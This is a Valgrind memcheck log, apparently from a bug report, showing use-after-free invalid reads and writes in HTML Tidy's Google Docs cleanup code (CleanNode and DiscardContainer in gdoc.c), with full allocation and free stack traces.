==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2E6: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D318: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D327: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D3BF: CleanNode (src/gdoc.c:131)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d78 is 40 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D338: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b9fb78 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D4C8: DiscardContainer (src/gdoc.c:62)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D4D7: DiscardContainer (src/gdoc.c:64)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e50 is 0 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D4E2: DiscardContainer (src/gdoc.c:66)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e60 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D4EA: DiscardContainer (src/gdoc.c:66)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e70 is 32 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D4EE: DiscardContainer (src/gdoc.c:66)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c43080 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D4F6: DiscardContainer (src/gdoc.c:68)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e60 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D505: DiscardContainer (src/gdoc.c:70)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
